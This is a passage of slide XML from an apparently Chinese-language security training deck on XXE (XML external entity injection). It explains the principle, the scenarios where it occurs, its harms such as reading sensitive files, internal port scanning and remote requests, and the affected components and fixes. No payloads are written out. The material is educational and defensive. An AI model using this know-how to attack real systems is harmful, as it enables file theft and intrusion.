          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="4047644" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="4047644"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06</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Shape 194"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="2153152"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防范</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186">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DECE92-4B36-CB5B-5096-746FDFA0AA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12798814" y="3154976"/>
            <a:ext cx="5586527" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="5586526" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C0B463-91CA-6F07-7607-2C9757AC5323}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="5586526" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="5586525" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Shape 181">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{860EFAAF-90C0-C961-739A-ED97E516BAB8}"/>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2</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 182">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B6FFB6-B04F-6E8B-956C-BFFF7AC6B616}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="3692033"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en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>XXE</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>漏洞的危害</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Shape 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97662E8B-FA9B-BD74-F635-4CD819756622}"/>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198">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AC199D-F7FD-0A36-5354-7E23C59E6474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12811076" y="9459147"/>
            <a:ext cx="9045807" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="9045807" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80866E7C-B9E9-3703-6E96-A582C6908EC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="9045807" cy="1046436"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="9045807" cy="1046434"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 193">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F48942-9E81-72C1-93AC-AD673838D073}"/>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5</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Shape 194">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0656B753-704D-7EEC-F71D-73ECEEDBCF34}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1894491" y="294360"/>
                <a:ext cx="7151315"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可能造成</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>xxe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>的组件及修复方式</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Shape 197">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C7E8DFE-20BE-D1A9-410A-5B6CE741EFAE}"/>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4289239421"/>
      </p:ext>
    </p:extLst>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F85819-918F-51E7-6688-1656FAF50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9183114"/>
            <a:ext cx="4762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AEC1D44-8D42-2895-6A5B-15D8E8235409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046923" y="2504061"/>
            <a:ext cx="22316660" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML External Entity Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XMl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>外部实体注入漏洞。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞触发点往往是可以上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的位置，没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件进行过滤，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行、内网端口扫描、攻击内网网站、发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击等危害 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一种非常流利的标记语言，在解析外部实体的过程中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器可以根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中指定的方案（协议）来查询各种网络协议和服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等）。外部实体对于在文档中创建动态引用非常有用，这样对引用资源所做的任何更改都会在文档中自动更新。但是，在处理外部实体时，可以针对应用程序启动许多攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据在传输过程中被利用外部实体声明部分修改，导致服务器器执行了被修改的恶意代码</a:t>
            </a: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漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4843841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466132" y="2000478"/>
            <a:ext cx="21446876" cy="10433625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML External Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）漏洞可以出现在以下场景中：</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XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当应用程序接受用户提交的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据并对其进行解析时，如果没有适当地配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器或实施安全措施，攻击者可以通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档中插入恶意的外部实体引用来利用</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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当应用程序通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务接收和处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据时，如果未正确配置和验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器，攻击者可以通过在请求中插入恶意的外部实体引用来触发</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文件上传</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当应用程序接受用户上传的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件并对其进行解析时，如果没有正确的文件类型验证和安全处理，攻击者可以通过在上传的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件中嵌入外部实体引用来实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击。</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SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求和响应</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当应用程序使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议进行通信时，如果未正确配置和验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解析器，攻击者可以通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求或响应中插入恶意的外部实体引用来利用</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数据库导入和导出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当应用程序从数据库导出数据为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式或从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>导入数据到数据库时，如果没有适当的处理和过滤，攻击者可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据中注入恶意的外部实体引用来触发</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旧版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>处理器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用过时或不安全的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>处理器，这些处理器可能不支持或不启用安全功能，容易受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞的攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="pingfang SC"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15659555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3" y="2504061"/>
            <a:ext cx="21389009" cy="7232749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入漏洞的危害</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取敏感文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者可以通过解析恶意实体引用来读取本地或远程文件系统中的敏感文件，如密码文件、配置文件等。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执行远程请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者可以利用远程实体来执行任意的网络请求，如发送</a:t>
            </a:r>
            <a:r>
